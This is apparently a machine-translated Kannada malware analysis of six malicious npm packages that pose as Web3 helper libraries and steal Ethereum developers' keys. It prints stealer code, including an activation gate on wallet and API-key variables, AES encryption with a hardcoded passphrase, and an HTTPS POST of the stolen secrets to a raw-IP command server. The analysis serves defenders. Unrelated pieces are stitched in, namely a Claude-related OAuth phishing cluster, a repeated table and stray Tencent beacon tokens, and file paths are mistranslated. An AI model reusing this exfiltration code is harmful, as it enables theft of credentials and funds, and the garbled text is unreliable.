ಟಿಎಲ್; ಡಿಆರ್
ಮೇ 6, 2026 ರಂದು, ಒಬ್ಬ npm ಪ್ರಕಾಶಕ, namikazesarada010206, Ethereum, Solidity ಮತ್ತು DeFi ಡೆವಲಪರ್ ಪರಿಸರ ವ್ಯವಸ್ಥೆಯನ್ನು ಗುರಿಯಾಗಿಸಿಕೊಂಡು ಆರು ದುರುದ್ದೇಶಪೂರಿತ ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ತಳ್ಳಿತು.
ಪ್ಯಾಕೇಜ್ ಗಳು, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, ಮತ್ತು web3-utils-core, ಜನಪ್ರಿಯ Web3 ಪರಿಕರಗಳಿಗಾಗಿ ಸಹಾಯಕ ಗ್ರಂಥಾಲಯಗಳಂತೆ ಕಾಣುವಂತೆ ವಿನ್ಯಾಸಗೊಳಿಸಲಾದ ತೋರಿಕೆಯ ಹೆಸರುಗಳನ್ನು ಬಳಸಲಾಗಿದೆ.
ಎಲ್ಲಾ ಆರು ಪ್ಯಾಕೇಜ್ಗಳು ಒಂದೇ ರೀತಿಯದ್ದನ್ನು ಒಳಗೊಂಡಿವೆ telemetry.js ಫೈಲ್. ಫೈಲ್ ಕ್ಲಸ್ಟರ್ನಾದ್ಯಂತ ಬೈಟ್-ಒಂದೇ ಆಗಿತ್ತು, ಜೊತೆಗೆ SHA-256:
ಮಾಲ್ವೇರ್ ಸ್ಥಾಪನೆಯ ಸಮಯದಲ್ಲಿ ಕಾರ್ಯಗತಗೊಳ್ಳುವುದಿಲ್ಲ. ಇಲ್ಲ preinstall or postinstall ಹುಕ್. ಬದಲಾಗಿ, ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಆಮದು ಮಾಡಿಕೊಂಡಾಗ ಅದು ಸಕ್ರಿಯಗೊಳ್ಳುತ್ತದೆ. require().
ಆ ವಿವರ ಮುಖ್ಯ.
ಡೆವಲಪರ್ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ನಿಜವಾಗಿಯೂ ಬಳಸುವವರೆಗೆ ಇಂಪ್ಲಾಂಟ್ ಕಾಯುತ್ತದೆ. ನಂತರ ಅದು ಕಾರ್ಯಸ್ಥಳವು ನಿಜವಾದ ಎಥೆರಿಯಮ್ / ಸಾಲಿಡಿಟಿ ಅಭಿವೃದ್ಧಿ ಪರಿಸರದಂತೆ ಕಾಣುತ್ತಿದೆಯೇ ಎಂದು ಪರಿಶೀಲಿಸುತ್ತದೆ. ಇದು ಆಲ್ಕೆಮಿ ಅಥವಾ ಇನ್ಫ್ಯೂರಾ ಕೀಗಳು, ಖಾಸಗಿ ಕೀಗಳು, ಜ್ಞಾಪಕಶಾಸ್ತ್ರ, ನಿಯೋಜಕ ಕೀಗಳು ಅಥವಾ ಸ್ಥಳೀಯ ಫೌಂಡ್ರಿ ಡೈರೆಕ್ಟರಿಯನ್ನು ಹುಡುಕುತ್ತದೆ.
ಹೋಸ್ಟ್ ಹೊಂದಾಣಿಕೆಯಾದರೆ, ಕಳ್ಳನು SSH ಖಾಸಗಿ ಕೀಲಿಗಳನ್ನು, ಫೌಂಡ್ರಿ / ಗೆತ್ / ಬ್ರೌನಿ ವ್ಯಾಲೆಟ್ ಕೀಸ್ಟೋರ್ಗಳನ್ನು ಸಂಗ್ರಹಿಸುತ್ತಾನೆ, .env* ಫೈಲ್ಗಳು ಮತ್ತು ಸೂಕ್ಷ್ಮ ಪರಿಸರ ವೇರಿಯೇಬಲ್ಗಳನ್ನು ಒಳಗೊಂಡಿದೆ. ಇದು ಹಾರ್ಡ್ಕೋಡ್ ಮಾಡಿದ ಪಾಸ್ಫ್ರೇಸ್ ಬಳಸಿ AES-256-GCM ನೊಂದಿಗೆ ಬಂಡಲ್ ಅನ್ನು ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡುತ್ತದೆ ಮತ್ತು TLS ಪರಿಶೀಲನೆಯನ್ನು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿದ ಕಚ್ಚಾ IPv4 C2 ಎಂಡ್ಪಾಯಿಂಟ್ಗೆ ಅದನ್ನು ಎಕ್ಸ್ಫಿಲ್ಟ್ರೇಟ್ ಮಾಡುತ್ತದೆ.
Xygeni ನ ಮಾಲ್ವೇರ್ ಅರ್ಲಿ ವಾರ್ನಿಂಗ್ (MEW) ವ್ಯವಸ್ಥೆಯು ಎಲ್ಲಾ ಆರು ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ದುರುದ್ದೇಶಪೂರಿತವೆಂದು ದೃಢಪಡಿಸಿದೆ. npm ರಿಜಿಸ್ಟ್ರಿ ತೆಗೆದುಹಾಕುವಿಕೆ ವರದಿ ಬಂಡಲ್ ಬಾಕಿ ಇದೆ.
ಕ್ಲಸ್ಟರ್: ಆರು ಪ್ಯಾಕೇಜ್ಗಳು, ಒಬ್ಬ ಪ್ರಕಾಶಕರು
ಪ್ರಕಾಶಕರ ಖಾತೆ namikazesarada010206 ಪರಿಶೀಲಿಸದ Gmail ವಿಳಾಸಕ್ಕೆ ಲಿಂಕ್ ಮಾಡಲಾಗಿದೆ namikazesarada010206@gmail.com.
ಈ ಅಭಿಯಾನವು ಮೇ 6, 2026 ರಂದು ಒಂದೇ ದಿನದ ಪ್ರಕಟಣೆಯ ಸ್ಫೋಟವಾಗಿ ಕಾಣಿಸಿಕೊಂಡಿತು. ಎಲ್ಲಾ ಆರು ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಈ ಕೆಳಗಿನಂತೆ ಆವೃತ್ತಿ ಮಾಡಲಾಗಿದೆ 1.0.0, ಶೂನ್ಯ ರನ್ಟೈಮ್ ಅವಲಂಬನೆಗಳನ್ನು ಹೊಂದಿತ್ತು ಮತ್ತು ಕೇವಲ ಮೂರು ಫೈಲ್ಗಳನ್ನು ರವಾನಿಸಲಾಗಿದೆ:
package.json index.js telemetry.js ಅವರು ಅದೇ ಮೂಲ ಭಂಡಾರವನ್ನು ಸಹ ಘೋಷಿಸಿದರು:
https://github.com/harunosakura030303-maker/evmchain-config ಮೊದಲ ಮೂರು ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಮೊದಲ ಪ್ರಕಟಣೆಯಲ್ಲಿ MEW ಸ್ಕ್ಯಾನರ್ಗಳು ಸೆರೆಹಿಡಿದವು. ಪ್ರಕಾಶಕರ npm ಪ್ರೊಫೈಲ್ನ ವಿಶ್ಲೇಷಕರ ಪರಿಶೀಲನೆಯ ನಂತರ ಉಳಿದ ಮೂರನ್ನು ಬಲವಂತವಾಗಿ ಫ್ಲ್ಯಾಗ್ ಮಾಡಲಾಯಿತು. ಒಮ್ಮೆ ಅದೇ ಬೈಟ್-ಒಂದೇ ರೀತಿಯ telemetry.js ಕ್ಲಸ್ಟರ್ನಾದ್ಯಂತ ದೃಢಪಡಿಸಲಾಗಿದೆ, ಅವುಗಳನ್ನು ಸ್ಥಿರತೆಯಿಂದ ದುರುದ್ದೇಶಪೂರಿತವೆಂದು ಮುಚ್ಚಲಾಗಿದೆ.
| ಪ್ಯಾಕೇಜ್ | ಆವೃತ್ತಿ | npm ಪ್ರಕಟಿಸಲಾಗಿದೆ | MEW ಟಿಕೆಟ್ | ವರ್ಡಿಕ್ಟ್ |
|---|---|---|---|---|
| ವೀಮ್-ಕೋರ್ | 1.0.0 | 2026-05-06 01:38:44Z | #51049 | ದುರುದ್ದೇಶಪೂರಿತ |
| ವೀಮ್-ಯುಟಿಲ್ಸ್-ಕೋರ್ | 1.0.0 | 2026-05-06 | #51050 | ದುರುದ್ದೇಶಪೂರಿತ |
| ಹಾರ್ಡ್ಹ್ಯಾಟ್-ಕೋರ್-ಯುಟಿಲ್ಸ್ | 1.0.0 | 2026-05-06 | #51051 | ದುರುದ್ದೇಶಪೂರಿತ |
| ಇವಿಎಂ-ಯುಟಿಲ್ಸ್ | 1.0.0 | 2026-05-06 | #51069 | ದುರುದ್ದೇಶಪೂರಿತ, ಸ್ಥಿರತೆಯಿಂದ |
| ಫೌಂಡ್ರಿ-ಯುಟಿಲ್ಸ್ | 1.0.0 | 2026-05-06 | #51071 | ದುರುದ್ದೇಶಪೂರಿತ, ಸ್ಥಿರತೆಯಿಂದ |
| ವೆಬ್3-ಯುಟಿಲ್ಸ್-ಕೋರ್ | 1.0.0 | 2026-05-06 | #51070 | ದುರುದ್ದೇಶಪೂರಿತ, ಸ್ಥಿರತೆಯಿಂದ |
ಹೆಸರಿಸುವ ತಂತ್ರವು ಸರಳವಾದರೂ ಪರಿಣಾಮಕಾರಿಯಾಗಿದೆ.
ಈ ಪ್ಯಾಕೇಜ್ಗಳು ನಿಖರವಾದ ಅಪ್ಸ್ಟ್ರೀಮ್ ಹೆಸರುಗಳನ್ನು ಅನುಕರಿಸುವುದಿಲ್ಲ. ಬದಲಾಗಿ, ಅವು ತೋರಿಕೆಯ "ಉಪಯುಕ್ತತೆ" ಪ್ರತ್ಯಯಗಳನ್ನು ಬಳಸುತ್ತವೆ, ಉದಾಹರಣೆಗೆ -core, -utils, ಮತ್ತು -utils-core. ಅದು ಅವುಗಳನ್ನು ವೆಬ್3 ಪರಿಕರಗಳ ಬಳಿ ಡೆವಲಪರ್ ನೋಡಲು ನಿರೀಕ್ಷಿಸಬಹುದಾದ ಕಂಪ್ಯಾನಿಯನ್ ಲೈಬ್ರರಿಗಳಂತೆ ಕಾಣುವಂತೆ ಮಾಡುತ್ತದೆ.
| ದುರುದ್ದೇಶಪೂರಿತ ಪ್ಯಾಕೇಜ್ | ಕಾನೂನುಬದ್ಧ ಗುರಿ |
|---|---|
| ವೀಮ್-ಕೋರ್ | viem, ಜನಪ್ರಿಯ Ethereum ಟೈಪ್ಸ್ಕ್ರಿಪ್ಟ್ ಕ್ಲೈಂಟ್ |
| ವೀಮ್-ಯುಟಿಲ್ಸ್-ಕೋರ್ | ವೀಮ್ |
| ಹಾರ್ಡ್ಹ್ಯಾಟ್-ಕೋರ್-ಯುಟಿಲ್ಸ್ | ಹಾರ್ಡ್ಹ್ಯಾಟ್, ಒಂದು ಮುಖ್ಯವಾಹಿನಿಯ ಸಾಲಿಡಿಟಿ ಅಭಿವೃದ್ಧಿ ಪರಿಸರ |
| ಇವಿಎಂ-ಯುಟಿಲ್ಸ್ | ಜೆನೆರಿಕ್ ಇವಿಎಂ ಪರಿಕರಗಳ ನೇಮ್ಸ್ಪೇಸ್ |
| ಫೌಂಡ್ರಿ-ಯುಟಿಲ್ಸ್ | ಫೌಂಡ್ರಿ, ಸಾಲಿಡಿಟಿ ಟೂಲ್ಚೈನ್ |
| ವೆಬ್3-ಯುಟಿಲ್ಸ್-ಕೋರ್ | web3-utils, Web3.js ಸಹಾಯಕರು |
ಇದು "ಪೂರಕ ಪ್ಯಾಕೇಜ್" ಮಾದರಿಯಾಗಿದೆ: "ನಾನು ನಿಜವಾದ ಪ್ಯಾಕೇಜ್" ಅಲ್ಲ, ಆದರೆ "ನಾನು ನಿಜವಾದ ಪ್ಯಾಕೇಜ್ ಸುತ್ತಲೂ ಸಮಂಜಸ ಸಹಾಯಕನಂತೆ ಕಾಣುತ್ತೇನೆ."
ವೇಗವಾಗಿ ಚಲಿಸುತ್ತಿರುವ DeFi ಡೆವಲಪರ್ಗಳಿಗೆ, ಅಪಾಯವನ್ನು ಸೃಷ್ಟಿಸಲು ಅದು ಸಾಕು.
ಪ್ಯಾಕೇಜ್ ಆಮದು ಮಾಡಿಕೊಂಡಾಗ ಏನಾಗುತ್ತದೆ
ದಾಳಿ ಸರಪಳಿಯು ಚಿಕ್ಕದಾಗಿದೆ, ಉದ್ದೇಶಪೂರ್ವಕವಾಗಿದೆ ಮತ್ತು ಕ್ರಿಪ್ಟೋ-ಅಭಿವೃದ್ಧಿ ಪರಿಸರಗಳ ಮೇಲೆ ಕೇಂದ್ರೀಕೃತವಾಗಿದೆ.
ಯಾವುದೇ ಅನುಸ್ಥಾಪನಾ ಹುಕ್ ಇಲ್ಲ. ಬದಲಾಗಿ, ಪ್ರತಿ ಪ್ಯಾಕೇಜ್ ಒಂದು ಒಳಗೊಂಡಿದೆ index.js ಅದು ಸ್ಟಬ್ ಕಾರ್ಯವನ್ನು ರಫ್ತು ಮಾಡುತ್ತದೆ ಮತ್ತು ನಂತರ ದುರುದ್ದೇಶಪೂರಿತ ಟೆಲಿಮೆಟ್ರಿ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಲೋಡ್ ಮಾಡುತ್ತದೆ.
require('./telemetry').init(); ಇದರರ್ಥ ಮಾಲ್ವೇರ್ ಮೊದಲ ಆಮದಿನಲ್ಲೇ ಸಕ್ರಿಯಗೊಳ್ಳುತ್ತದೆ.
ಅದು ದಾಳಿಕೋರರಿಗೆ ಕಾರ್ಯಾಚರಣೆಯ ದೃಷ್ಟಿಯಿಂದ ಉಪಯುಕ್ತವಾಗಿದೆ. ಅನೇಕ ಸ್ಕ್ಯಾನರ್ಗಳು ಮತ್ತು ಸ್ಯಾಂಡ್ಬಾಕ್ಸ್ಗಳು ಸ್ಥಾಪನೆ-ಸಮಯದ ನಡವಳಿಕೆಯ ಮೇಲೆ ಕೇಂದ್ರೀಕರಿಸುತ್ತವೆ. ಈ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಡೆವಲಪರ್, ಬಿಲ್ಡ್ ಸ್ಕ್ರಿಪ್ಟ್, ಪರೀಕ್ಷಾ ಸೂಟ್ ಅಥವಾ ರನ್ಟೈಮ್ ಮಾರ್ಗವು ನಿಜವಾಗಿಯೂ ಬಳಸುವವರೆಗೆ ಕಾಯುತ್ತದೆ.
ಸಕ್ರಿಯಗೊಳಿಸುವಿಕೆ ಗೇಟ್: ರಿಯಲ್ ವೆಬ್3 ಡೆವಲಪರ್ ವರ್ಕ್ಸ್ಟೇಷನ್ಗಳಲ್ಲಿ ಮಾತ್ರ ಬೆಂಕಿ
ಇಂಪ್ಲಾಂಟ್ನ ಪ್ರಮುಖ ಭಾಗವೆಂದರೆ ಸಕ್ರಿಯಗೊಳಿಸುವ ದ್ವಾರ.
Ethereum / Solidity ಡೆವಲಪರ್ ಯಂತ್ರಗಳಲ್ಲಿ ಸಾಮಾನ್ಯವಾಗಿ ಕಂಡುಬರುವ ಪರಿಸರ ವೇರಿಯಬಲ್ಗಳಿಗಾಗಿ ಮಾಲ್ವೇರ್ ಪರಿಶೀಲಿಸುತ್ತದೆ:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); ಇದು ಫೌಂಡ್ರಿ ಸ್ಥಾಪಿಸಲಾಗಿದೆಯೇ ಎಂದು ಪರಿಶೀಲಿಸುತ್ತದೆ:
fs.existsSync(path.join(os.homedir(), '.foundry')) ಯಾವುದೇ ಷರತ್ತು ನಿಜವಾಗಿಲ್ಲದಿದ್ದರೆ, ಕಾರ್ಯವು ಹಿಂತಿರುಗುತ್ತದೆ ಮತ್ತು ಏನನ್ನೂ ಮಾಡುವುದಿಲ್ಲ.
ಅದು ಸಾಮಾನ್ಯ ವಿಶ್ಲೇಷಣಾ ಪರಿಸರದಲ್ಲಿ ಪ್ಯಾಕೇಜ್ ಅನ್ನು ನಿಶ್ಯಬ್ದವಾಗಿಸುತ್ತದೆ. ಫೌಂಡ್ರಿ, ಆಲ್ಕೆಮಿ ಕೀಗಳು, ಇನ್ಫ್ಯೂರಾ ಕೀಗಳು, ಖಾಸಗಿ ಕೀಗಳು ಅಥವಾ ಜ್ಞಾಪಕಶಾಸ್ತ್ರವಿಲ್ಲದ ಸ್ಯಾಂಡ್ಬಾಕ್ಸ್ ನಿರುಪದ್ರವವಾಗಿ ಕಾಣುವ ಆಮದನ್ನು ನೋಡಬಹುದು.
ಹೊಂದಾಣಿಕೆಯಾಗುವ ಹೋಸ್ಟ್ನಲ್ಲಿ, ಮಾಲ್ವೇರ್ ಸಂಗ್ರಹಣೆಗೆ 60 ರಿಂದ 90 ಸೆಕೆಂಡುಗಳ ಮೊದಲು ಕಾಯುತ್ತದೆ:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); ಈ ವಿಳಂಬವು ಆಮದು ಮತ್ತು ಹೊರಹರಿವಿನ ನಡುವಿನ ಸ್ಪಷ್ಟ ಸಂಬಂಧವನ್ನು ಕಡಿಮೆ ಮಾಡುತ್ತದೆ. .unref() ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಅಲ್ಪಾವಧಿಯ ಸ್ಕ್ರಿಪ್ಟ್ನಲ್ಲಿ ಆಮದು ಮಾಡಿಕೊಂಡಿದ್ದರೆ, ಹೋಸ್ಟ್ ಪ್ರಕ್ರಿಯೆಯು ಸಾಮಾನ್ಯವಾಗಿ ನಿರ್ಗಮಿಸಲು call ಅನುಮತಿಸುತ್ತದೆ.
ಇದು ಗದ್ದಲದ ಹೊಡೆತ ಮತ್ತು ಹಿಡಿಯುವ ನಡವಳಿಕೆಯಲ್ಲ. ಇದು ಡೆವಲಪರ್ ಪರಿಸರವು ಕದಿಯಲು ಯೋಗ್ಯವಾಗಿಲ್ಲದಿದ್ದರೆ ಓಡುವುದನ್ನು ತಪ್ಪಿಸಲು ವಿನ್ಯಾಸಗೊಳಿಸಲಾದ ಗುರಿ ಕಳ್ಳತನವಾಗಿದೆ.
ಕಳ್ಳನು ಏನನ್ನು ಸಂಗ್ರಹಿಸುತ್ತಾನೆ
ಸಕ್ರಿಯಗೊಳಿಸುವ ಗೇಟ್ ಹಾದುಹೋದ ನಂತರ, ಮಾಲ್ವೇರ್ Web3 ಅಭಿವೃದ್ಧಿಯಲ್ಲಿ ಹೆಚ್ಚು ಮುಖ್ಯವಾದ ಮೂಲಗಳಿಂದ ಸಂಗ್ರಹಿಸುತ್ತದೆ: ಖಾಸಗಿ ಕೀಗಳು, ವ್ಯಾಲೆಟ್ ಕೀಸ್ಟೋರ್ಗಳು, ನಿಯೋಜನಾ ರುಜುವಾತುಗಳು, ಕ್ಲೌಡ್ ರಹಸ್ಯಗಳು, npm ಟೋಕನ್ಗಳು ಮತ್ತು ಸ್ಥಳೀಯ ಪ್ರಾಜೆಕ್ಟ್ ಕಾನ್ಫಿಗರೇಶನ್.
| ಮೂಲ | ಏನು ಸಂಗ್ರಹಿಸಲಾಗಿದೆ |
|---|---|
| ಪ್ರಕ್ರಿಯೆ.env | ಯಾವುದೇ ವೇರಿಯೇಬಲ್ ಹೊಂದಾಣಿಕೆ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | ಪೂರ್ಣ ಫೈಲ್ ವಿಷಯ ಸೇರಿದಂತೆ, PRIVATE KEY ಅಥವಾ BEGIN OPENSSH ಅನ್ನು ಒಳಗೊಂಡಿರುವ ಫೈಲ್ಗಳು |
| ~/.ಫೌಂಡ್ರಿ/ಕೀಸ್ಟೋರ್ಗಳು/* | ಫೌಂಡ್ರಿ ವ್ಯಾಲೆಟ್ ಕೀಸ್ಟೋರ್ ಫೈಲ್ಗಳು |
| ~/.ಎಥೆರಿಯಮ್/ಕೀಸ್ಟೋರ್/* | ಗೆತ್ ವಾಲೆಟ್ ಕೀಸ್ಟೋರ್ ಫೈಲ್ಗಳು |
| ~/.ಬ್ರೌನಿ/ಖಾತೆಗಳು/* | ಬ್ರೌನಿ ವ್ಯಾಲೆಟ್ ಕೀಸ್ಟೋರ್ ಫೈಲ್ಗಳು |
| ${cwd}/.env | ಪೂರ್ಣ ಫೈಲ್ ವಿಷಯ |
| ${cwd}/.env.ಸ್ಥಳೀಯ | ಪೂರ್ಣ ಫೈಲ್ ವಿಷಯ |
| ${cwd}/.env. ಉತ್ಪಾದನೆ | ಪೂರ್ಣ ಫೈಲ್ ವಿಷಯ |
| ${cwd}/.env.ಅಭಿವೃದ್ಧಿ | ಪೂರ್ಣ ಫೈಲ್ ವಿಷಯ |
| os.ಹೋಸ್ಟ್ ಹೆಸರು() | ಹೋಸ್ಟ್ ಮೆಟಾಡೇಟಾ |
| ಕ್ರಿಪ್ಟೋ.ರ್ಯಾಂಡಮ್ಯುಯುಐಡಿ() | ಬಲಿಪಶು/ಅಧಿವೇಶನ ಗುರುತಿಸುವಿಕೆ |
| ದಿನಾಂಕ.ಈಗ() | ಸಂಗ್ರಹ ಸಮಯಸ್ಟ್ಯಾಂಪ್ |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA ಟೋಕನ್ಗಳು:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 ಟೆಲಿಮೆಟ್ರಿಯು ಆಪರೇಟರ್ನ ಸ್ವಂತ ವಿಶ್ಲೇಷಣೆಯೋ ಅಥವಾ ಪ್ರತ್ಯೇಕವಾಗಿ ಹಣಗಳಿಸಿದ ಚಾನಲ್ವೋ ಎಂಬುದನ್ನು ನಾವು ಖಚಿತಪಡಿಸಲು ಸಾಧ್ಯವಾಗಿಲ್ಲ. ನಾವು ಪರೀಕ್ಷಿಸಿದ ಎರಡೂ ಮಾದರಿಗಳಲ್ಲಿ ATTA ಟೋಕನ್ಗಳು ಒಂದೇ ಆಗಿವೆ.
ಕ್ಲಸ್ಟರ್ ಬಿ: ಹೈಬೈ
claude.hk OAuth ಫಿಶಿಂಗ್ + ANTHROPIC_BASE_URL ಹೈಜಾಕ್
ಏಪ್ರಿಲ್ 1 ರ ಮಾದರಿಯು ಅಭಿಯಾನದ ಅತ್ಯಂತ ಒರಟಾದ ಮತ್ತು ಮುಂಚಿನ ಅಂಗವಾಗಿದೆ.
heibai:2.1.88-claude.hk-4 ಇವರಿಂದ ಪ್ರಕಟಿಸಲಾಗಿದೆ wuguoqiangvip28, ಜೂನ್ 7, 2025 ರಂದು ರಚಿಸಲಾದ ಖಾತೆ. ಪ್ಯಾಕೇಜ್ ಕಾನೂನುಬದ್ಧಕ್ಕೆ ವಿರುದ್ಧವಾಗಿ ಸ್ಪಷ್ಟವಾಗಿ ಆವೃತ್ತಿಯನ್ನು ಹೊಂದಿದೆ. 2.1.88 ಮಾನವಜನ್ಯ ಬಿಡುಗಡೆ.
ಇದು CA-ಸರ್ಟ್ MITM ಬಗ್ಗೆ ತಲೆಕೆಡಿಸಿಕೊಳ್ಳುವುದಿಲ್ಲ. ಬದಲಾಗಿ, ಇದು OAuth ಎಂಡ್ಪಾಯಿಂಟ್ ಬಗ್ಗೆ ಬಳಕೆದಾರರಿಗೆ ಸುಳ್ಳು ಹೇಳುತ್ತದೆ.
ಸೋರಿಕೆಯಾದ ಕ್ಲೌಡ್ ಕೋಡ್ ಮೂಲದ ಮೇಲಿರುವ ದುರುದ್ದೇಶಪೂರಿತ ಸೇರ್ಪಡೆಗಳು ಸೇರಿವೆ:
| ಮೂಲ | ಏನು ಸಂಗ್ರಹಿಸಲಾಗಿದೆ |
|---|---|
| ಪ್ರಕ್ರಿಯೆ.env | ಯಾವುದೇ ವೇರಿಯೇಬಲ್ ಹೊಂದಾಣಿಕೆ /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | ಪೂರ್ಣ ಫೈಲ್ ವಿಷಯ ಸೇರಿದಂತೆ, PRIVATE KEY ಅಥವಾ BEGIN OPENSSH ಅನ್ನು ಒಳಗೊಂಡಿರುವ ಫೈಲ್ಗಳು |
| ~/.ಫೌಂಡ್ರಿ/ಕೀಸ್ಟೋರ್ಗಳು/* | ಫೌಂಡ್ರಿ ವ್ಯಾಲೆಟ್ ಕೀಸ್ಟೋರ್ ಫೈಲ್ಗಳು |
| ~/.ಎಥೆರಿಯಮ್/ಕೀಸ್ಟೋರ್/* | ಗೆತ್ ವಾಲೆಟ್ ಕೀಸ್ಟೋರ್ ಫೈಲ್ಗಳು |
| ~/.ಬ್ರೌನಿ/ಖಾತೆಗಳು/* | ಬ್ರೌನಿ ವ್ಯಾಲೆಟ್ ಕೀಸ್ಟೋರ್ ಫೈಲ್ಗಳು |
| ${cwd}/.env | ಪೂರ್ಣ ಫೈಲ್ ವಿಷಯ |
| ${cwd}/.env.ಸ್ಥಳೀಯ | ಪೂರ್ಣ ಫೈಲ್ ವಿಷಯ |
| ${cwd}/.env. ಉತ್ಪಾದನೆ | ಪೂರ್ಣ ಫೈಲ್ ವಿಷಯ |
| ${cwd}/.env.ಅಭಿವೃದ್ಧಿ | ಪೂರ್ಣ ಫೈಲ್ ವಿಷಯ |
| os.ಹೋಸ್ಟ್ ಹೆಸರು() | ಹೋಸ್ಟ್ ಮೆಟಾಡೇಟಾ |
| ಕ್ರಿಪ್ಟೋ.ರ್ಯಾಂಡಮ್ಯುಯುಐಡಿ() | ಬಲಿಪಶು/ಅಧಿವೇಶನ ಗುರುತಿಸುವಿಕೆ |
| ದಿನಾಂಕ.ಈಗ() | ಸಂಗ್ರಹ ಸಮಯಸ್ಟ್ಯಾಂಪ್ |
ಗುರಿ ಪಟ್ಟಿಯು ಹೆಚ್ಚು ನಿರ್ದಿಷ್ಟವಾಗಿದೆ. ಇದು ಸಾಮಾನ್ಯ ಬ್ರೌಸರ್ ಕಳ್ಳತನ ಅಥವಾ ವಿಶಾಲವಾದ ರುಜುವಾತು ಸ್ಕ್ರ್ಯಾಪಿಂಗ್ ಅಲ್ಲ. ಇದು Ethereum ಅಪ್ಲಿಕೇಶನ್ಗಳನ್ನು ನಿರ್ಮಿಸುವ, ಪರೀಕ್ಷಿಸುವ, ನಿಯೋಜಿಸುವ ಅಥವಾ ನಿರ್ವಹಿಸುವ ಡೆವಲಪರ್ಗಳನ್ನು ಗುರಿಯಾಗಿರಿಸಿಕೊಂಡಿದೆ.
ಫೌಂಡ್ರಿ, ಗೆತ್ ಮತ್ತು ಬ್ರೌನಿ ಕೀಸ್ಟೋರ್ಗಳ ಸೇರ್ಪಡೆ ವಿಶೇಷವಾಗಿ ಮುಖ್ಯವಾಗಿದೆ. ಈ ಫೈಲ್ಗಳು ವ್ಯಾಲೆಟ್ಗಳು ಅಥವಾ ನಿಯೋಜನಾ ಗುರುತುಗಳಿಗೆ ನೇರ ಪ್ರವೇಶವನ್ನು ಪ್ರತಿನಿಧಿಸಬಹುದು. ದಾಳಿಕೋರರು ಅವುಗಳನ್ನು ಪಾಸ್ವರ್ಡ್ಗಳು, ಜ್ಞಾಪಕ ಪತ್ರಗಳು ಅಥವಾ ಪರಿಸರ ರಹಸ್ಯಗಳೊಂದಿಗೆ ಜೋಡಿಸಬಹುದಾದರೆ, ಅವರು ಹಣವನ್ನು ಸರಿಸಲು, ನಿಯೋಜಕರನ್ನು ಅನುಕರಿಸಲು ಅಥವಾ ಸ್ಮಾರ್ಟ್ ಒಪ್ಪಂದ ಕಾರ್ಯಾಚರಣೆಗಳನ್ನು ರಾಜಿ ಮಾಡಲು ಸಾಧ್ಯವಾಗುತ್ತದೆ.
ಹೊರಹಾಕುವ ಮೊದಲು ಎನ್ಕ್ರಿಪ್ಶನ್
ಮಾಲ್ವೇರ್ ಸಂಗ್ರಹಿಸಿದ ಡೇಟಾವನ್ನು ಕಳುಹಿಸುವ ಮೊದಲು ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡುತ್ತದೆ.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); ಹಾರ್ಡ್ಕೋಡ್ ಮಾಡಿದ ಪಾಸ್ಫ್ರೇಸ್ ಹೀಗಿದೆ:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d ಅಂತಿಮ ಪೇಲೋಡ್ ಅನ್ನು JSON ಆಗಿ ಸುತ್ತಿಡಲಾಗಿದೆ:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} ಎನ್ಕ್ರಿಪ್ಶನ್ ಮಾಲ್ವೇರ್ ಅನ್ನು ಸ್ವತಃ ಹೆಚ್ಚು ಮುಂದುವರಿದಂತೆ ಮಾಡುವುದಿಲ್ಲ. ಆದಾಗ್ಯೂ, ಇದು ನೆಟ್ವರ್ಕ್ ತಪಾಸಣೆಯನ್ನು ಕಠಿಣಗೊಳಿಸುತ್ತದೆ. ನಿರ್ಗಮನವನ್ನು ವೀಕ್ಷಿಸುವ ರಕ್ಷಕನು JSON ಪೇಲೋಡ್ ಅನ್ನು ನೋಡುತ್ತಾನೆ, ಆದರೆ ಕದ್ದ ಕೀಗಳು, ವ್ಯಾಲೆಟ್ ಫೈಲ್ಗಳು ಅಥವಾ .env ಹಾರ್ಡ್ಕೋಡೆಡ್ ಪಾಸ್ಫ್ರೇಸ್ ಮತ್ತು ಡೀಕ್ರಿಪ್ಶನ್ ಲಾಜಿಕ್ ಇಲ್ಲದ ವಿಷಯಗಳು.
Raw IPv4 C2 ಗೆ ಹೊರಹಾಕುವಿಕೆ
ಹೊರಹರಿವಿನ ಮಾರ್ಗವನ್ನು ಹಾರ್ಡ್ಕೋಡ್ ಮಾಡಲಾಗಿದೆ:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); ಮಾಲ್ವೇರ್ ಡೇಟಾವನ್ನು ಇಲ್ಲಿಗೆ ಕಳುಹಿಸುತ್ತದೆ:
https://76.13.37.80:8443/api/v1/telemetry ಎರಡು ವಿವರಗಳು ಎದ್ದು ಕಾಣುತ್ತವೆ.
